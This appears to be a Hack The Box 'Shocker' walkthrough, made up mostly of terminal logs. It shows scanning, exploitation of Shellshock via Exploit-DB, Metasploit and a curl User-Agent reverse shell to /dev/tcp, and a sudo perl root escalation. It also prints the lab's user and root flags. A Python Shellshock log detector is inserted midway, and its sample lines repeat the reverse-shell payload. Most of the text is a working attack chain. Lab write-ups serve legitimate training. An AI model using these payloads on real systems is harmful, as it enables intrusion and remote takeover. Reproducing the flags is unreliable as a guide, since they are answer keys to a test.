Shocker

$ nmap -p- -T4 -A 10.10.10.56
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
$ dirb http://10.10.10.56
---- Scanning URL: http://10.10.10.56/ ----
+ http://10.10.10.56/cgi-bin/ (CODE:403|SIZE:294)
+ http://10.10.10.56/index.html (CODE:200|SIZE:137)
+ http://10.10.10.56/server-status (CODE:403|SIZE:299)
$ nikto -h http://10.10.10.56
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: 89, size: 559ccac257884, mtime: gzip
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8673 requests: 0 error(s) and 7 item(s) reported on remote host
DirBuster
http://shocker.htb/cgi-bin/
http://shocker.htb/cgi-bin/user.sh
shellshock (Apache mod_cgi)
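As an added defender-side example (not part of the original writeup), the following Python scans Apache combined-format access log lines for the `() {` function-definition prefix that the Shellshock request later in this writeup carries in its User-Agent header. The log lines are constructed samples, and the parser assumes the stock combined LogFormat (Referer and User-Agent are the only request headers that format records).

```python
import re

# Constructed sample lines in Apache "combined" format (not taken from the box).
SAMPLE_LOG = r'''
10.10.14.136 - - [21/Jul/2021:13:40:01 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "() { :; }; /bin/bash -i >& /dev/tcp/10.10.14.136/4488 0>&1"
10.10.14.136 - - [21/Jul/2021:13:40:05 +0000] "GET /index.html HTTP/1.1" 200 137 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.10.14.136 - - [21/Jul/2021:13:40:09 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "() { ignored; }; echo vulnerable" "curl/7.74.0"
10.10.14.136 - - [21/Jul/2021:13:40:12 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "curl/7.74.0"
'''

# Combined LogFormat: host ident user [time] "request" status size "referer" "agent".
# Apache escapes embedded quotes as \", so quoted fields allow backslash escapes.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)

# CVE-2014-6271: vulnerable bash only acts on an env var whose value starts with
# the literal "() {"; mod_cgi turns every request header into an HTTP_* env var,
# so a header value with that prefix is the signature worth alerting on.
SHELLSHOCK_RE = re.compile(r'^\(\)\s*\{')

HEADER_NAMES = {"referer": "Referer", "agent": "User-Agent"}


def parse_combined(line):
    """Return the named fields of one combined-format line, or None if unparseable."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_shellshock(log_text):
    """Return one hit per header value carrying the Shellshock prefix."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_combined(line.strip())
        if rec is None:
            continue
        for field, header in HEADER_NAMES.items():
            if SHELLSHOCK_RE.match(rec[field]):
                hits.append({
                    "host": rec["host"],
                    "time": rec["time"],
                    "request": rec["request"],
                    "header": header,
                    "payload": rec[field],
                    # A CGI path as the target raises the severity: that is where
                    # the header actually reaches bash as an environment variable.
                    "cgi_target": "/cgi-bin/" in rec["request"],
                })
    return hits


if __name__ == "__main__":
    for hit in find_shellshock(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["host"]} {hit["header"]} -> {hit["request"]}: {hit["payload"]!r}')
```

Other headers (Cookie, custom headers) reach mod_cgi the same way but are not in the combined log, so full coverage needs a LogFormat that records them or inspection at a proxy.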
$ wget https://exploit-db.com/download/34900
$ python 34900 payload=reverse rhost=10.10.10.56 lhost=10.10.14.136 lport=4444 pages=/cgi-bin/user.sh
$ msfconsole
msf6 > use exploit/multi/http/apache_mod_cgi_bash_env_exec 
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set lhost 10.10.14.136
lhost => 10.10.14.136
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set rhost 10.10.10.56
rhost => 10.10.10.56
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set targeturi /cgi-bin/user.sh
targeturi => /cgi-bin/user.sh
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > check
[+] 10.10.10.56:80 - The target is vulnerable.
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > run
meterpreter > cat user.txt
bb8993b669abf54fac2f0289c2082ae4
$ curl -H 'User-Agent: () { :; }; /bin/bash -i  >& /dev/tcp/10.10.14.136/4488 0>&1' http://10.10.10.56:80/cgi-bin/user.sh
kali@kali:~/0.htb/machines/Shocker56$ nc -lvnp 4488
listening on [any] 4488 ...
connect to [10.10.14.136] from (UNKNOWN) [10.10.10.56] 38008
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ 
shelly@Shocker:/usr/lib$ cd /home
cd /home
shelly@Shocker:/home$ ls
ls
shelly
shelly@Shocker:/home$ cd shelly
cd shelly
shelly@Shocker:/home/shelly$ ls -la
ls -la
total 36
drwxr-xr-x 4 shelly shelly 4096 Sep 22  2017 .
drwxr-xr-x 3 root   root   4096 Sep 22  2017 ..
-rw------- 1 root   root      0 Sep 25  2017 .bash_history
-rw-r--r-- 1 shelly shelly  220 Sep 22  2017 .bash_logout
-rw-r--r-- 1 shelly shelly 3771 Sep 22  2017 .bashrc
drwx------ 2 shelly shelly 4096 Sep 22  2017 .cache
drwxrwxr-x 2 shelly shelly 4096 Sep 22  2017 .nano
-rw-r--r-- 1 shelly shelly  655 Sep 22  2017 .profile
-rw-r--r-- 1 root   root     66 Sep 22  2017 .selected_editor
-rw-r--r-- 1 shelly shelly    0 Sep 22  2017 .sudo_as_admin_successful
-r--r--r-- 1 root   root     33 Jul 21 13:35 user.txt
shelly@Shocker:/home/shelly$ cat user.txt
cat user.txt
bb8993b669abf54fac2f0289c2082ae4
shelly@Shocker:/home/shelly$ 
shelly@Shocker:/home/shelly$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
shelly@Shocker:/home/shelly$ 
shelly@Shocker:/home/shelly$ sudo /usr/bin/perl -e 'exec "/bin/sh"'
sudo /usr/bin/perl -e 'exec "/bin/sh"'
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
cat root.txt
d4244dc773bdc765d8e763659a63f565